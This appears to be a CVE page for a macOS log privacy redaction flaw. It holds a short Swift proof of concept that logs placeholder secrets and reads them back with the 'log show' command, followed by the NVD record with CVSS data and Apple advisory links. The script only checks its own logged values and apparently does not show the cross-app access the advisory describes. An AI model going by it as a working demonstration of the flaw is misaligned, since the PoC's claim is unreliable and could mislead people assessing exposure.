CVE-2025-43477

# CVE-2025-43477 PoC - macOS Log Privacy Information Disclosure # This PoC demonstrates the vulnerability in macOS log privacy redaction import Foundation import os.log class LogPrivacyTest { func triggerSensitiveDataLeak() { let logger = Logger(subsystem: "com.test.app", category: "privacy_test") // Sensitive data that should be redacted let sensitiveUserData = [ "user_email": "[email protected]", "user_token": "sk-1234567890abcdef", "user_ssn": "123-45-6789", "api_key": "AKIAIOSFODNN7EXAMPLE" ] // Vulnerable logging - data not properly redacted logger.info("User data: \(sensitiveUserData)") // Read logs using log command let task = Process() task.launchPath = "/usr/bin/log" task.arguments = ["show", "--predicate", "subsystem == 'com.test.app'", "--last", "1"] let pipe = Pipe() task.standardOutput = pipe task.launch() task.waitUntilExit() let data = pipe.fileHandleForReading.readDataToEndOfFile() let output = String(data: data, encoding: .utf8) ?? "" // If sensitive data appears in output, vulnerability exists print("Log output: \(output)") print("Vulnerability confirmed if sensitive data is visible") } } // Usage let test = LogPrivacyTest() test.triggerSensitiveDataLeak()

{"cve": {"id": "CVE-2025-43477", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:52.110", "lastModified": "2026-04-02T19:20:52.690", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1. An app may be able to access sensitive user data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.2", "matchCriteriaId": "9827CBDC-8C03-46BA-B534-8533F0975804"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.2", "matchCriteriaId": "4BE8199E-63D1-496C-B107-52853CFC2311"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125636", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}